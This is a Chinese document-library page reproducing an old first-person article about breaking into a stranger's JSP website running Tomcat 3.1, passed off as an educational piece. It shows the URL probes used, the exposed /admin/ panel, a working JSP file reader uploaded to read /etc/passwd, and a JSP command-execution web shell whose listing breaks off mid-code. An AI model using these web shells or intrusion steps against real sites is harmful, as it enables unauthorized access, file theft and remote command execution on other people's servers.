欢迎来到天天文库
浏览记录
ID:34656315
大小:118.32 KB
页数:4页
时间:2019-03-08
《黑客业务web 入侵的过程jsp》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、WEB入侵的过程jsp作者:lovehacker来源:http://blog.csdn.net/amh/archive/2004/12/27/230496.aspx本文描述了如何通过WEB入侵获得freebsd4.0的root权限。文章主要以教育为目的,希望各位观者不要使用本文中的一些方法及程序,危害网络的安全。作者:lovehacker联系方式:lovehacker@263.net网站地址:http://www.chinansl.com版权属安盟信息科技有限责任公司所有,允许转载,但需保持文章的完整性。很偶然的一个机会,看到了一
2、个网站,页面清新,很舒服的感觉。网站是用JSP开发的,由于个人爱好,所以我决定看看系统的安全性。telnetwww.target.com8080GET/CHINANSLHTTP/1.1[Enter][Enter]返回的结果如下:HTTP/1.0404NotFoundDate:Sun,08Jul200107:49:13GMTServlet-Engine:TomcatWebServer/3.1(JSP1.1;Servlet2.2;Java1.2.2;Linux2.2.12i386;java.vendor=BlackdownJava-L
3、inuxTeam)Content-Language:enContent-Type:text/htmlStatus:404
4、//target:8080/file/index.jsp(不行)http://target:8080/index.JSP(不行)http://target:8080/index.jsp%81(不行)http://target:8080/index.js%70(不行)http://target:8080/index.jsp%2581(不行)http://target:8080/WEB-INF/(不行)嗯,在试试吧!Tomcat3.1自带了一个管理工具,可以查看WEB下的目录及文件,并且可以添加context.试一下:http://t
5、arget:8080/admin/管理员果然没有删除或禁止访问这个目录:-(失误!!!!!接着我点"VIEWALLCONTEXT"按钮,列出了WEB目录下的一些文件和目录的名称,我开始仔细的看了起来,一小会儿,发现了一个上传文件的组件,嘿嘿,写一个jsp文件弄上去看看。几口咖啡的时间,我写了这么一个东东出来:<%@pageimport="java.io.*"%><%Stringfile=request.getParameter("file");Stringstr="";FileInputStreamfis=null;DataInp
6、utStreamdis=null;try{fis=newFileInputStream(file);dis=newDataInputStream(fis);while(true){try{str=dis.readLine();}catch(Exceptione){}if(str==null)break;out.print(str+"");}}catch(IOExceptione){}%>通过上传的组件将这个jsp上传到对方的WEB目录里,然后:http://target:8080/upload/test.jsp?file=
7、/etc/passwd嘿嘿,密码出来啦。我只看了"/etc/passwd",并没有看"/etc/shadow",因为当时考虑webserver一般使用nobody的身份启动的,看了也白看。(失误)接下来的过程是无聊的猜测密码,没有成功。算了,那我只有将就点,反正现在我相当于有了一个shell了嘛,猜不出密码上去,那就全当IE是我的SHELL环境吧!再写:<%@pageimport="java.io.*"%><%try{Stringcmd=request.getParameter("cmd");Processchild=Runtim
8、e.getRuntime().exec(cmd);InputStreamin=child.getInputStream();intc;while((c=in.read())!=-1){out.print((char)c);}in.close();t
此文档下载收益归作者所有